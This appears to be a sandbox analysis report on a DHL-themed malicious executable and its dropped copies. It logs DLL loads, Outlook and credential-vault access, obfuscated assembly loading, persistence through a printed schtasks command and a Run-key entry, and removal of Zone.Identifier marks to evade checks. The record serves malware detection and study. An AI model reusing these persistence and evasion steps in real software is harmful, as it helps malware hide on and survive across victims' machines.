                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: DHL_1003671162.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL_1003671162.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: DHL_1003671162.exe, --.cs .Net Code: _0002
                      Source: qmUxKv.exe.0.dr, --.cs .Net Code: _0002
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs .Net Code: CG1Rxu67QA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs .Net Code: CG1Rxu67QA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_1003671162.exe.7190000.10.raw.unpack, HomeView.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Code function: 0_2_0289EBE0 pushad ; iretd 0_2_0289EBE1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Code function: 0_2_071B61EF pushad ; retf 0_2_071B61F0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Code function: 0_2_071B61E5 pushad ; retf 0_2_071B61E6
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Code function: 0_2_0AE82C68 push eax; ret 0_2_0AE82C71
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Code function: 7_2_012AEBE0 pushad ; iretd 7_2_012AEBE1
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Code function: 7_2_06D2D261 pushad ; iretd 7_2_06D2D26D
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Code function: 7_2_06D24383 push eax; retf 7_2_06D24389
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Code function: 7_2_06D2DE00 push es; retf 7_2_06D2DE0C
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Code function: 7_2_06FC61EF pushad ; retf 7_2_06FC61F0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Code function: 7_2_06FC61E5 pushad ; retf 7_2_06FC61E6
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 12_2_016DEBE0 pushad ; iretd 12_2_016DEBE1
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 12_2_032BBDD8 push eax; iretd 12_2_032BC505
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 12_2_032BC4F8 push eax; iretd 12_2_032BC505
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 12_2_077A61EF pushad ; retf 12_2_077A61F0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 12_2_077A61E5 pushad ; retf 12_2_077A61E6
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F595 push es; iretd 16_2_0696F5C8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F5DD push es; iretd 16_2_0696F5E0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F5CD push es; iretd 16_2_0696F5DC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F5C9 push es; iretd 16_2_0696F5CC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F510 push es; iretd 16_2_0696F51C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F51D push es; iretd 16_2_0696F520
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F521 push es; iretd 16_2_0696F524
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F555 push es; iretd 16_2_0696F55C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F544 push es; iretd 16_2_0696F548
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F549 push es; iretd 16_2_0696F554
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F571 push es; iretd 16_2_0696F57C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F57D push es; iretd 16_2_0696F588
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696F56D push es; iretd 16_2_0696F570
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 16_2_0696FB90 push es; ret 16_2_0696FBA0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 17_2_025BEBE0 pushad ; iretd 17_2_025BEBE1
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Code function: 20_2_0686F5CF push es; iretd 20_2_0686F5DC
                      Source: DHL_1003671162.exe Static PE information: section name: .text entropy: 7.970864904869302
                      Source: qmUxKv.exe.0.dr Static PE information: section name: .text entropy: 7.970864904869302
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack High entropy of concatenated method names: reported for 21 classes
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack High entropy of concatenated method names: reported for 21 classes
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe File created: C:\Users\user\AppData\Roaming\qmUxKv.exe
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe File created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXv

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Users\user\Desktop\DHL_1003671162.exe File opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe File opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: boqXv.exe PID: 6972, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: boqXv.exe PID: 7656, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 2890000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 2A00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 4A00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 8A40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 7330000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 9A40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: AA40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: B1F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 8A40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 1470000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 2EE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: 4EE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 1260000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 2B90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 4B90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 8B00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 9B00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 9D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: AD00000 memory reserve | memory write watch
